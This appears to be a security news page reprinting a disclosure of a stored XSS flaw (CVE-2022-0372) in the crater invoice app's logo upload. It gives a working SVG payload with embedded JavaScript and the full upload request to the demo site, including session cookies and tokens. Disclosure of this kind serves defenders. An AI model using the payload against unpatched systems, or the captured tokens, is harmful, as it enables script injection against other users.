Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0372: Cross-site Scripting (XSS) - Stored in crater

Cross-site Scripting (XSS) - Stored in Packagist bytefury/crater prior to 6.0.2.

CVE
Open in Source
#xss#vulnerability#linux#js#java

Description

There is a vulnerability in the upload avatar functionality of crater invoice which would allow an attacker to upload malicious .SVG files in order to execute Javascript. All that is required is that the victim browse to the link location of the .SVG file

Proof of Concept

xss.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("svg xss");
   </script>
</svg>

Request:

POST /api/v1/company/upload-logo HTTP/1.1
Host: demo.craterapp.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
company: 2
X-XSRF-TOKEN: eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------202251926415456929271193356967
Content-Length: 735
Origin: https://demo.craterapp.com
DNT: 1
Connection: keep-alive
Referer: https://demo.craterapp.com/admin/settings/company-info
Cookie: __stripe_mid=7d4c8a79-b568-4a3b-a898-67c90bb47968edd571; __stripe_sid=1cf6fd84-0a75-41ee-af21-ad527c27e72ce39a5c; XSRF-TOKEN=eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJaTTJTc0E3eVZWWXhjT3BZYnJlSnc9PSIsInZhbHVlIjoiTU5jaFY5MTk4SWRRZEZYMC8zSDkxZDhLMHp0NklPU1RtQUE3dEkwRzByMGVVY3BBSG1TeUI5ZkhKRGJsWHhybThEeFNjREdyd295UmVBV0h1dVAzb3Z6U3JiZ0ErNUtPTnRYMlpBNnJXR0lWN2JObGtDKzJ0MVRMaDVpSzlKOFQiLCJtYWMiOiIxYTc1YmM3OWZiYTM4OTA3ZWIwZWU5NzA5NGIxYzRkMGM2MGJlNTI0NjcyZGQ3ZWVjNWIyMTQzMTFhOGY5NjY4IiwidGFnIjoiIn0%3D; kQ8ZSOBtOqtWUFzuaiCYX7I5LKHRDCE3lwldiGew=eyJpdiI6IkQ3VE5lWjlINkU3Y1ZvUktSdkhSS1E9PSIsInZhbHVlIjoiSFBCcDNsYVd3K3JIL3BhVWRHUWs3THBmVEl1MWtOYmo4VzUrT2p2azhzV3ZoY2lWcUk0KzlXZWJOK3ZLbUtML3N6SGxXV3FjeGU1c0lvcGwrYnlMWTByNk9mbWcrcjlSd2VtNTVZcUtiTDJvb0pyUDhmdlJZUXc3cjlJOHMzZEJscXVWZGJzRmJyRzhNcEpENnNGOWxEK3d3S200OG5hd3duZ2tCazRZaDBVUWkvZlgxaWtoNC9HenlTb2QyVmlnY2pIUSt4bmw0YnkzWGNibjNKcWxkY1B3RzV3c0pHYURnNDJMRXBkUHFrWDEvQkdORkYzK0xXTVVoSEx3YldWN0J2ZEJkTytSWU1tR0VVUFhheTVMek1XWStiZnFrZTArU0pMUFhEWE8yZStkRkpzWS9oM1hsTk00L01mY2tWSko4NFdZcUtBRlo0N0QvMWZBZmR3bVRRU29zRXJyM3RZdmpDRGE4MG9EelR2eUQzZThQK1R2dDc0dEJoMmE2OTZMT3h1eWhZdXN3bkhjVTFrTThXTStPdzhtemkzMEdKdXRoTC96RXFtSzh3MEZJanFGRjI3bGpMN3hyTllrQjk5UFdpdUNiY3ZzQThyUjF3enVvZHpkc3p3TCt3eDJnQmxvUjZQWXNmRC9aWGdQMk0rcENPNmNaaTVEbk9QWit4bitGOENKRWpSSTR2UllXZFpuYUhEQmpidE40ZXFwZHVsYkMwbk84eDBGVzVSR2w4S0pXNDgwZUU2UjJpL0tIb2ZnIiwibWFjIjoiNDRmMDY0MjE5ZTNmNmE3ZGQ5Yzg2N2U1ZTYyZDk2MzU2YWQ3YTg1MDE2Y2FlYzcyN2MyNGZlODdjYmY4ZjFiMSIsInRhZyI6IiJ9
Sec-GPC: 1

-----------------------------202251926415456929271193356967
Content-Disposition: form-data; name="company_logo"

{"name":"xss.svg","data":"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgo8c3ZnIHZlcnNpb249IjEuMSIgYmFzZVByb2ZpbGU9ImZ1bGwiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiAgIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgICBhbGVydCgic3ZnIHhzcyIpOwogICA8L3NjcmlwdD4KPC9zdmc+Cg=="}
-----------------------------202251926415456929271193356967--

Response:

{"success":true}

Impact

This vulnerability is capable of Javascript code execution. An attacker can use this to upload a malicious .SVG file with Javascript embedded into it, then whenever a user visits the link to the .SVG file, the malicious Javascript would execute.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE